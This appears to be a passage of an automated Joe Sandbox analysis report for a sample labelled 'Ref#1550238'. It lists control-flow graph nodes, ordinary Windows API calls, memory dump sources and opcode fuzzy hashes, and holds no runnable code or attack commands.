                                                      control_flow_graph 526 164da60-164daef GetCurrentProcess 530 164daf1-164daf7 526->530 531 164daf8-164db2c GetCurrentThread 526->531 530->531 532 164db35-164db69 GetCurrentProcess 531->532 533 164db2e-164db34 531->533 535 164db72-164db8a 532->535 536 164db6b-164db71 532->536 533->532 538 164db93-164dbc2 GetCurrentThreadId 535->538 536->535 540 164dbc4-164dbca 538->540 541 164dbcb-164dc2d 538->541 540->541
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0164DADE
                                                      • GetCurrentThread.KERNEL32 ref: 0164DB1B
                                                      • GetCurrentProcess.KERNEL32 ref: 0164DB58
                                                      • GetCurrentThreadId.KERNEL32 ref: 0164DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: e6ff7354d0c1c0308d3a89c570af478c642cd0c6a600292cab0fa5b28c2fadd1
                                                      • Instruction ID: a1d9b0ae18c3dffe2d3f4595b2232bf096c9449b019b73260a4a299bd1ab9fc7
                                                      • Opcode Fuzzy Hash: e6ff7354d0c1c0308d3a89c570af478c642cd0c6a600292cab0fa5b28c2fadd1
                                                      • Instruction Fuzzy Hash: 405176B0D003098FDB14DFAAD988B9EBBF5EF48304F208419E419A7390DB746845CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 571 164b3b7-164b3d7 572 164b403-164b407 571->572 573 164b3d9-164b3e6 call 1649684 571->573 574 164b409-164b413 572->574 575 164b41b-164b45c 572->575 578 164b3fc 573->578 579 164b3e8 573->579 574->575 582 164b45e-164b466 575->582 583 164b469-164b477 575->583 578->572 628 164b3ee call 164b660 579->628 629 164b3ee call 164b65f 579->629 582->583 585 164b479-164b47e 583->585 586 164b49b-164b49d 583->586 584 164b3f4-164b3f6 584->578 587 164b538-164b5f8 584->587 589 164b480-164b487 call 164a714 585->589 590 164b489 585->590 588 164b4a0-164b4a7 586->588 621 164b600-164b62b GetModuleHandleW 587->621 622 164b5fa-164b5fd 587->622 593 164b4b4-164b4bb 588->593 594 164b4a9-164b4b1 588->594 592 164b48b-164b499 589->592 590->592 592->588 596 164b4bd-164b4c5 593->596 597 164b4c8-164b4d1 call 164a724 593->597 594->593 596->597 602 164b4d3-164b4db 597->602 603 164b4de-164b4e3 597->603 602->603 604 164b4e5-164b4ec 603->604 605 164b501-164b505 603->605 604->605 607 164b4ee-164b4fe call 164a734 call 164a744 604->607 626 164b508 call 164b960 605->626 627 164b508 call 164b931 605->627 607->605 610 164b50b-164b50e 612 164b510-164b52e 610->612 613 164b531-164b537 610->613 612->613 623 164b634-164b648 621->623 624 164b62d-164b633 621->624 622->621 624->623 626->610 627->610 628->584 629->584
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0164B61E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: d6343b78bd4871f97fe626a8c7687d9b0f348b641d15bb50f645716318c8dc87
                                                      • Instruction ID: 438d1625c1a51067024707ff3e32ef7fb95f6cb1c5e7392c8e298803e2e9d32f
                                                      • Opcode Fuzzy Hash: d6343b78bd4871f97fe626a8c7687d9b0f348b641d15bb50f645716318c8dc87
                                                      • Instruction Fuzzy Hash: DF813670A01B058FEB28DF69D94475ABBF1FF88204F008A2DD48AD7B50D735E94ACB95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 630 56f1e05-56f1e76 631 56f1e78-56f1e7e 630->631 632 56f1e81-56f1e88 630->632 631->632 633 56f1e8a-56f1e90 632->633 634 56f1e93-56f1f32 CreateWindowExW 632->634 633->634 636 56f1f3b-56f1f73 634->636 637 56f1f34-56f1f3a 634->637 641 56f1f75-56f1f78 636->641 642 56f1f80 636->642 637->636 641->642 643 56f1f81 642->643 643->643
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056F1F22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: cbb4c5528cbffb0c2fe381dc390e8f72881480090eaf0090e3ae6b23be16c0a0
                                                      • Instruction ID: 8f1b1763e41a3aa8a1fa4b19d55360b1e5d3ec077d1c12801189e5ba0f22ae48
                                                      • Opcode Fuzzy Hash: cbb4c5528cbffb0c2fe381dc390e8f72881480090eaf0090e3ae6b23be16c0a0
                                                      • Instruction Fuzzy Hash: 2351CEB1D00349EFDB14CFA9C880ADDBBF1BF48350F24812AE919AB250D7759945CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 644 56f1e10-56f1e76 645 56f1e78-56f1e7e 644->645 646 56f1e81-56f1e88 644->646 645->646 647 56f1e8a-56f1e90 646->647 648 56f1e93-56f1f32 CreateWindowExW 646->648 647->648 650 56f1f3b-56f1f73 648->650 651 56f1f34-56f1f3a 648->651 655 56f1f75-56f1f78 650->655 656 56f1f80 650->656 651->650 655->656 657 56f1f81 656->657 657->657
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056F1F22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: ca1c047b6002f86cdcd916384ca2df07df3d376b9c5c8ffd8ac8307b2c79ebe1
                                                      • Instruction ID: 7075d37b06c1e29120431c3d2609d6656df7fafa82d3c6a02f88f6b232135196
                                                      • Opcode Fuzzy Hash: ca1c047b6002f86cdcd916384ca2df07df3d376b9c5c8ffd8ac8307b2c79ebe1
                                                      • Instruction Fuzzy Hash: 1941CDB1C00348EFDB14CFAAC884ADEBBF5BF49350F24812AE819AB250D7719841CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 658 56f4560-56f459c 659 56f464c-56f466c 658->659 660 56f45a2-56f45a7 658->660 666 56f466f-56f467c 659->666 661 56f45fa-56f4632 CallWindowProcW 660->661 662 56f45a9-56f45e0 660->662 664 56f463b-56f464a 661->664 665 56f4634-56f463a 661->665 669 56f45e9-56f45f8 662->669 670 56f45e2-56f45e8 662->670 664->666 665->664 669->666 670->669
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 056F4621
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: bb8f0748df9235744f4abe881614bec26962a2e7d66c2a7f06f42f01f86b7e30
                                                      • Instruction ID: 5b2ef4192cb0728d1c9d4a3dcbfbebb8352d0a0fc67d037d54369eec438fb68c
                                                      • Opcode Fuzzy Hash: bb8f0748df9235744f4abe881614bec26962a2e7d66c2a7f06f42f01f86b7e30
                                                      • Instruction Fuzzy Hash: C3415AB8D00309CFCB14CF99C448AAABBF5FF88315F248459D519AB321DB70A841CFA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 672 164dca8-164dd3c DuplicateHandle 673 164dd45-164dd62 672->673 674 164dd3e-164dd44 672->674 674->673
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164DD2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 46bb05fba3a5e6f476d89c036ed3a2c1fe7626c727850d1b09e66a1cfa7ea3bc
                                                      • Instruction ID: fffb0b04eaa0f4c12bf1cd72a3236ae7471d7c3442f61d05427e023ac4fdf932
                                                      • Opcode Fuzzy Hash: 46bb05fba3a5e6f476d89c036ed3a2c1fe7626c727850d1b09e66a1cfa7ea3bc
                                                      • Instruction Fuzzy Hash: 7421E4B5D002499FDB10CFAAD884ADEFBF4FB48310F14841AE954A3350D374A941CFA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 677 164b5b8-164b5f8 678 164b600-164b62b GetModuleHandleW 677->678 679 164b5fa-164b5fd 677->679 680 164b634-164b648 678->680 681 164b62d-164b633 678->681 679->678 681->680
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0164B61E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 76677405c8094bc233596fe5b8c00e3b1e8518806c261e725d5c41c03691c50f
                                                      • Instruction ID: 55ba9905aba9d18af0e11bc98da654c085ede5fed2dab098abc5c45838d2064d
                                                      • Opcode Fuzzy Hash: 76677405c8094bc233596fe5b8c00e3b1e8518806c261e725d5c41c03691c50f
                                                      • Instruction Fuzzy Hash: C91113B5C003498FDB10DF9AC844BDEFBF4EB48314F10841AD419A7200C375A545CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca4d0d040101a3c94aa36e00d66e0aaf86ede54e979d804049d65d90d056e8ae
                                                      • Instruction ID: 9c031ad2e384ce7b52dcb4c96b9c09cedfd438d3c8d8509522325618118b2e3a
                                                      • Opcode Fuzzy Hash: ca4d0d040101a3c94aa36e00d66e0aaf86ede54e979d804049d65d90d056e8ae
                                                      • Instruction Fuzzy Hash: 6F214571604244DFDB05EF54D8C0B56BF65FB84328F20C169E9091B646C736E446CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741168782.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_138d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb71786db55829347316d4797ef4dbdcad4a1562e1ff5f2f0277389d68fce382
                                                      • Instruction ID: 7ec6b5463b543978a7e972c972d3dc2751bf1789531231484d84385feadac420
                                                      • Opcode Fuzzy Hash: bb71786db55829347316d4797ef4dbdcad4a1562e1ff5f2f0277389d68fce382
                                                      • Instruction Fuzzy Hash: C221F2B5604304DFDB15EF94D9C4B16BB65FB84328F20C56DD84A4B786C336D847CA62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction ID: dd8f53c058c33a005cad031d2a9b6aa30049a9e761fc467ec5467395710efdd9
                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction Fuzzy Hash: 82110376504280CFCB06DF54D9C0B56BF72FB84328F24C5A9D8490B657C336E45ACBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741168782.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_138d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                      • Instruction ID: 57ebb4a054e4771e08f2b76bea6f7ddce66b7972403ade9f74fdceab91485394
                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                      • Instruction Fuzzy Hash: 0411BEB5504380CFDB16DF54D5C4B15BB62FB44318F24C6A9D8494B696C33AD40BCB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68bf4ab02c995436f037b855f08ee9e50c206b6986fe83d343353a22b88a1130
                                                      • Instruction ID: 608c0f5e9fa678efee43ee3d9b83a41baae6a4a9b2db824d4ef0db6146db73a5
                                                      • Opcode Fuzzy Hash: 68bf4ab02c995436f037b855f08ee9e50c206b6986fe83d343353a22b88a1130
                                                      • Instruction Fuzzy Hash: 2701F7310083949BE7206E59DCC4B66BFDCDF41229F04C01AED090A582C37C9840CAB2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17c8fa69ea91380d6e08ff2ebc82eff73745a135503d38c93ba65af0114da183
                                                      • Instruction ID: 06ee30b50157ae643f42747b08934bd87f2417715198f79b9cdbbc7a2a507ab5
                                                      • Opcode Fuzzy Hash: 17c8fa69ea91380d6e08ff2ebc82eff73745a135503d38c93ba65af0114da183
                                                      • Instruction Fuzzy Hash: 64F06D71408394AEE7209E1AD884B62FF98EB41639F18C55AED484A287C379A844CAB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cff75fbfbd02259b22bf4587a7f460ade4817dfc60632ff8c4b7d7a3a3685455
                                                      • Instruction ID: 078e51532d663525786c5e98f7b4958eae58b214e8c4c8a93cbf2189a554a28c
                                                      • Opcode Fuzzy Hash: cff75fbfbd02259b22bf4587a7f460ade4817dfc60632ff8c4b7d7a3a3685455
                                                      • Instruction Fuzzy Hash: BD1288B1403B458BD718EF69E84C1893BB6B74B329B504209D2611F2EDDBB815EACF74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44aa1b0f762cd2d06b832b9c50b2e1f0220bf09613273653e18b2330ccc7db71
                                                      • Instruction ID: 5c2db9ded4a2e20b9ba4417ebd5b1814a918274f4e3eea89e56693d366f571a2
                                                      • Opcode Fuzzy Hash: 44aa1b0f762cd2d06b832b9c50b2e1f0220bf09613273653e18b2330ccc7db71
                                                      • Instruction Fuzzy Hash: C8A18132E012158FCF09DFB9C84459EBBB2FF85301B1585AAE906AB325DB31E956CF50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ecfc4e1dd09d1a03c53c58410a6aba4c657b71d1f002a93c0eea29d7c308c08
                                                      • Instruction ID: 5ced8ba4bfdd3198a656235d33837f69bcfb027d231dbadc23833a44beaa6a2c
                                                      • Opcode Fuzzy Hash: 2ecfc4e1dd09d1a03c53c58410a6aba4c657b71d1f002a93c0eea29d7c308c08
                                                      • Instruction Fuzzy Hash: 65C1FCB1413B458BD718EF68E8481897BB6BB8B325F604309D1612B2DDDBB414EACF74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2a046293e8829dc34579cd2d71ba08f25f5343db32eede035b1f911bfc4c49b
                                                      • Instruction ID: 0215cd04171c1fbb648d3741c49d854f2a22528b348052b3faadf4f5382a00d1
                                                      • Opcode Fuzzy Hash: a2a046293e8829dc34579cd2d71ba08f25f5343db32eede035b1f911bfc4c49b
                                                      • Instruction Fuzzy Hash: 23910B34A18208CFE714CF58D088B99B7F3FB88314F19A265D505AB796DB74AC86CF60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 761f3391363c67ba6355ab5f0fcf00d786123146e601384d0bc35e2c7c1e5077
                                                      • Instruction ID: b951439dc4e64a880903d6d01b5a67e5a03707ee4db9a3b4fc0380c625595e1c
                                                      • Opcode Fuzzy Hash: 761f3391363c67ba6355ab5f0fcf00d786123146e601384d0bc35e2c7c1e5077
                                                      • Instruction Fuzzy Hash: 1C91ED34A18208CFE714CF58D088B99B7B3FB88354F15A265D505AB796DB74BC86CF60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 302ee65166eccb6f5340c034752e3a5f4e34df456de9b076273b8d9498d403d3
                                                      • Instruction ID: 2f5f4a4d87862b6789dafb81158a91ecb7d86d1377031766ffb2068c542eb482
                                                      • Opcode Fuzzy Hash: 302ee65166eccb6f5340c034752e3a5f4e34df456de9b076273b8d9498d403d3
                                                      • Instruction Fuzzy Hash: F1815A31F04204CFD714CFA9C484BBAB3B3FB84302F54C56AD61A9BA54E774A986CB61